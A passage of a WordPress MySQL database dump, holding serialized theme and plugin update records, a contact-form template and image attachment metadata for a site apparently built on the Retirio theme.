theme/twentytwentyfour.1.1.zip\";s:8:\"requires\";s:3:\"6.4\";s:12:\"requires_php\";s:3:\"7.0\";}s:15:\"twentytwentyone\";a:6:{s:5:\"theme\";s:15:\"twentytwentyone\";s:11:\"new_version\";s:3:\"2.2\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.2.2.zip\";s:8:\"requires\";s:3:\"5.3\";s:12:\"requires_php\";s:3:\"5.6\";}s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.4.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:15:\"twentytwentytwo\";a:6:{s:5:\"theme\";s:15:\"twentytwentytwo\";s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentytwentytwo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentytwo.1.7.zip\";s:8:\"requires\";s:3:\"5.9\";s:12:\"requires_php\";s:3:\"5.6\";}}s:9:\"no_update\";a:0:{}s:12:\"translations\";a:0:{}}','no'),(15104,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1719932585;s:8:\"response\";a:8:{s:13:\"cmb2/init.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:18:\"w.org/plugins/cmb2\";s:4:\"slug\";s:4:\"cmb2\";s:6:\"plugin\";s:13:\"cmb2/init.php\";s:11:\"new_version\";s:6:\"2.11.0\";s:3:\"url\";s:35:\"https://wordpress.org/plugins/cmb2/\";s:7:\"package\";s:47:\"https://downloads.wordpress.org/plugin/cmb2.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:49:\"https://ps.w.org/cmb2/assets/icon.svg?rev=2866672\";s:3:\"svg\";s:49:\"https://ps.w.org/cmb2/assets/icon.svg?rev=2866672\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/cmb2/assets/banner-1544x500.png?rev=2866672\";s:2:\"1x\";s:59:\"https://ps.w.org/cmb2/assets/banner-772x250.png?rev=2866672\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.8.0\";s:6:\"tested\";s:5:\"6.4.5\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:36:\"contact-form-7/wp-contact-form-7.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/contact-form-7\";s:4:\"slug\";s:14:\"contact-form-7\";s:6:\"plugin\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:11:\"new_version\";s:5:\"5.9.6\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/contact-form-7/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/contact-form-7.5.9.6.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";s:3:\"svg\";s:59:\"https://ps.w.org/contact-form-7/assets/icon.svg?rev=2339255\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/contact-form-7/assets/banner-1544x500.png?rev=860901\";s:2:\"1x\";s:68:\"https://ps.w.org/contact-form-7/assets/banner-772x250.png?rev=880427\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.3\";s:6:\"tested\";s:5:\"6.5.5\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:32:\"duplicate-page/duplicatepage.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/duplicate-page\";s:4:\"slug\";s:14:\"duplicate-page\";s:6:\"plugin\";s:32:\"duplicate-page/duplicatepage.php\";s:11:\"new_version\";s:5:\"4.5.3\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/duplicate-page/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/duplicate-page.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:67:\"https://ps.w.org/duplicate-page/assets/icon-128x128.jpg?rev=1412874\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/duplicate-page/assets/banner-772x250.jpg?rev=1410328\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.4\";s:6:\"tested\";s:5:\"6.3.5\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"3.22.3\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.22.3.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=2597493\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=3005087\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=3005087\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:5:\"6.5.5\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}}s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:30:\"w.org/plugins/mailchimp-for-wp\";s:4:\"slug\";s:16:\"mailchimp-for-wp\";s:6:\"plugin\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:11:\"new_version\";s:6:\"4.9.13\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/mailchimp-for-wp/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/mailchimp-for-wp.4.9.13.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/mailchimp-for-wp/assets/icon-256x256.png?rev=1224577\";s:2:\"1x\";s:69:\"https://ps.w.org/mailchimp-for-wp/assets/icon-128x128.png?rev=1224577\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/mailchimp-for-wp/assets/banner-772x250.png?rev=1184706\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";s:6:\"tested\";s:5:\"6.5.5\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}s:47:\"one-click-demo-import/one-click-demo-import.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:35:\"w.org/plugins/one-click-demo-import\";s:4:\"slug\";s:21:\"one-click-demo-import\";s:6:\"plugin\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:11:\"new_version\";s:5:\"3.2.1\";s:3:\"url\";s:52:\"https://wordpress.org/plugins/one-click-demo-import/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/one-click-demo-import.3.2.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-256x256.png?rev=2506685\";s:2:\"1x\";s:74:\"https://ps.w.org/one-click-demo-import/assets/icon-128x128.png?rev=2506685\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/one-click-demo-import/assets/banner-1544x500.png?rev=2506685\";s:2:\"1x\";s:76:\"https://ps.w.org/one-click-demo-import/assets/banner-772x250.png?rev=2506685\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:5:\"6.5.5\";s:12:\"requires_php\";s:3:\"5.6\";s:16:\"requires_plugins\";a:0:{}}s:27:\"updraftplus/updraftplus.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:25:\"w.org/plugins/updraftplus\";s:4:\"slug\";s:11:\"updraftplus\";s:6:\"plugin\";s:27:\"updraftplus/updraftplus.php\";s:11:\"new_version\";s:6:\"1.24.3\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/updraftplus/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/updraftplus.1.24.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-256x256.jpg?rev=1686200\";s:2:\"1x\";s:64:\"https://ps.w.org/updraftplus/assets/icon-128x128.jpg?rev=1686200\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/updraftplus/assets/banner-1544x500.png?rev=1686200\";s:2:\"1x\";s:66:\"https://ps.w.org/updraftplus/assets/banner-772x250.png?rev=1686200\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.2\";s:6:\"tested\";s:3:\"6.6\";s:12:\"requires_php\";b:0;s:16:\"requires_plugins\";a:0:{}}s:53:\"widget-importer-exporter/widget-importer-exporter.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:38:\"w.org/plugins/widget-importer-exporter\";s:4:\"slug\";s:24:\"widget-importer-exporter\";s:6:\"plugin\";s:53:\"widget-importer-exporter/widget-importer-exporter.php\";s:11:\"new_version\";s:5:\"1.6.1\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/widget-importer-exporter/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/widget-importer-exporter.1.6.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/widget-importer-exporter/assets/icon-256x256.jpg?rev=990577\";s:2:\"1x\";s:76:\"https://ps.w.org/widget-importer-exporter/assets/icon-128x128.jpg?rev=990577\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/widget-importer-exporter/assets/banner-1544x500.jpg?rev=775677\";s:2:\"1x\";s:78:\"https://ps.w.org/widget-importer-exporter/assets/banner-772x250.jpg?rev=741218\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.5\";s:6:\"tested\";s:5:\"6.5.5\";s:12:\"requires_php\";s:5:\"5.2.4\";s:16:\"requires_plugins\";a:0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:3:{s:75:\"recent-posts-widget-with-thumbnails/recent-posts-widget-with-thumbnails.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:49:\"w.org/plugins/recent-posts-widget-with-thumbnails\";s:4:\"slug\";s:35:\"recent-posts-widget-with-thumbnails\";s:6:\"plugin\";s:75:\"recent-posts-widget-with-thumbnails/recent-posts-widget-with-thumbnails.php\";s:11:\"new_version\";s:5:\"7.1.1\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/recent-posts-widget-with-thumbnails/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/recent-posts-widget-with-thumbnails.7.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:88:\"https://ps.w.org/recent-posts-widget-with-thumbnails/assets/icon-256x256.png?rev=2478511\";s:2:\"1x\";s:88:\"https://ps.w.org/recent-posts-widget-with-thumbnails/assets/icon-128x128.png?rev=2478511\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/recent-posts-widget-with-thumbnails/assets/banner-1544x500.jpg?rev=2480188\";s:2:\"1x\";s:90:\"https://ps.w.org/recent-posts-widget-with-thumbnails/assets/banner-772x250.jpg?rev=2480188\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:35:\"insert-headers-and-footers/ihaf.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:40:\"w.org/plugins/insert-headers-and-footers\";s:4:\"slug\";s:26:\"insert-headers-and-footers\";s:6:\"plugin\";s:35:\"insert-headers-and-footers/ihaf.php\";s:11:\"new_version\";s:6:\"2.1.14\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/insert-headers-and-footers/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/insert-headers-and-footers.2.1.14.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-256x256.png?rev=2758516\";s:2:\"1x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-128x128.png?rev=2758516\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/insert-headers-and-footers/assets/banner-1544x500.png?rev=2758516\";s:2:\"1x\";s:81:\"https://ps.w.org/insert-headers-and-footers/assets/banner-772x250.png?rev=2758516\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:31:\"elementor-pro/elementor-pro.php\";O:8:\"stdClass\":3:{s:7:\"license\";s:5:\"valid\";s:7:\"expires\";s:10:\"01.01.2030\";s:6:\"plugin\";s:31:\"elementor-pro/elementor-pro.php\";}}s:7:\"checked\";a:16:{s:13:\"cmb2/init.php\";s:6:\"2.10.1\";s:36:\"contact-form-7/wp-contact-form-7.php\";s:5:\"5.6.4\";s:32:\"duplicate-page/duplicatepage.php\";s:5:\"4.4.9\";s:23:\"elementor/elementor.php\";s:5:\"3.8.1\";s:31:\"elementor-pro/elementor-pro.php\";s:5:\"3.8.1\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:6:\"4.8.11\";s:47:\"one-click-demo-import/one-click-demo-import.php\";s:5:\"3.1.2\";s:31:\"ova-framework/ova-framework.php\";s:3:\"1.0\";s:27:\"ova-project/ova-project.php\";s:5:\"1.0.2\";s:19:\"ova-sev/ova-sev.php\";s:5:\"1.0.1\";s:21:\"ova-team/ova-team.php\";s:5:\"1.0.1\";s:75:\"recent-posts-widget-with-thumbnails/recent-posts-widget-with-thumbnails.php\";s:5:\"7.1.1\";s:23:\"revslider/revslider.php\";s:6:\"6.5.25\";s:27:\"updraftplus/updraftplus.php\";s:6:\"1.23.3\";s:53:\"widget-importer-exporter/widget-importer-exporter.php\";s:3:\"1.6\";s:35:\"insert-headers-and-footers/ihaf.php\";s:6:\"2.1.14\";}}','no');
/*!40000 ALTER TABLE `wpev_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_postmeta`
--

DROP TABLE IF EXISTS `wpev_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=4740 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_postmeta`
--

LOCK TABLES `wpev_postmeta` WRITE;
/*!40000 ALTER TABLE `wpev_postmeta` DISABLE KEYS */;
INSERT INTO `wpev_postmeta` VALUES (3,5,'_wpcode_auto_insert','1'),(4,5,'_wpcode_auto_insert_number','1'),(5,6,'_wpcode_auto_insert','1'),(6,6,'_wpcode_library_id','12'),(11,9,'_form','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]'),(12,9,'_mail','a:8:{s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:53:\"[_site_title] <wordpress@bauhaus.futuremediatrix.com>\";s:4:\"body\";s:163:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:19:\"[_site_admin_email]\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(13,9,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:53:\"[_site_title] <wordpress@bauhaus.futuremediatrix.com>\";s:4:\"body\";s:105:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(14,9,'_messages','a:12:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:27:\"Please fill out this field.\";s:16:\"invalid_too_long\";s:32:\"This field has a too long input.\";s:17:\"invalid_too_short\";s:33:\"This field has a too short input.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:31:\"The uploaded file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";}'),(15,9,'_additional_settings',''),(16,9,'_locale','en_US'),(17,10,'_elementor_edit_mode','builder'),(18,10,'_elementor_template_type','kit'),(19,11,'_wp_attached_file','woocommerce-placeholder.png'),(20,11,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:27:\"woocommerce-placeholder.png\";s:8:\"filesize\";i:102644;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10546;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84297;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3767;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49572;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48731;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21123;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-378x824.png\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51314;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:70270;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21,18,'_wp_attached_file','2022/11/log_file_2022-11-14__03-29-35.txt'),(22,19,'_wp_attached_file','2022/06/logo-black.png'),(23,19,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:638;s:6:\"height\";i:140;s:4:\"file\";s:22:\"2022/06/logo-black.png\";s:8:\"filesize\";i:9129;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"logo-black-300x66.png\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5950;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-black-150x140.png\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:313;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-black-390x140.png\";s:5:\"width\";i:390;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1967;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"logo-black-378x140.png\";s:5:\"width\";i:378;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1684;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"logo-black-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1008;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"logo-black-600x132.png\";s:5:\"width\";i:600;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13347;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"logo-black-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:420;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24,20,'_wp_attached_file','2022/06/Logo-white.png'),(25,20,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:542;s:6:\"height\";i:140;s:4:\"file\";s:22:\"2022/06/Logo-white.png\";s:8:\"filesize\";i:8407;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"Logo-white-300x77.png\";s:5:\"width\";i:300;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4843;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Logo-white-150x140.png\";s:5:\"width\";i:150;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:510;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"Logo-white-390x140.png\";s:5:\"width\";i:390;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3119;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"Logo-white-378x140.png\";s:5:\"width\";i:378;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2930;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"Logo-white-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1506;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"Logo-white-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:497;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26,20,'_wp_attachment_image_alt','logo-retirio'),(27,139,'_wp_attached_file','2022/06/lines.png'),(28,139,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:265;s:6:\"height\";i:858;s:4:\"file\";s:17:\"2022/06/lines.png\";s:8:\"filesize\";i:11598;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"lines-93x300.png\";s:5:\"width\";i:93;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11432;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"lines-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8951;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:17:\"lines-265x660.png\";s:5:\"width\";i:265;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5021;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:17:\"lines-265x473.png\";s:5:\"width\";i:265;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4004;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:17:\"lines-265x824.png\";s:5:\"width\";i:265;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5742;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:17:\"lines-265x473.png\";s:5:\"width\";i:265;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4004;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"lines-265x300.png\";s:5:\"width\";i:265;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2947;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"lines-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6083;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30,145,'_wp_attached_file','2022/06/bg-footer-right.png'),(31,145,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:632;s:6:\"height\";i:792;s:4:\"file\";s:27:\"2022/06/bg-footer-right.png\";s:8:\"filesize\";i:115787;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-239x300.png\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30752;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13032;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-632x660.png\";s:5:\"width\";i:632;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101462;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67948;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-378x792.png\";s:5:\"width\";i:378;s:6:\"height\";i:792;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:88343;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:27:\"bg-footer-right-632x473.png\";s:5:\"width\";i:632;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:87638;}s:21:\"woocommerce_thumbnail\";a:6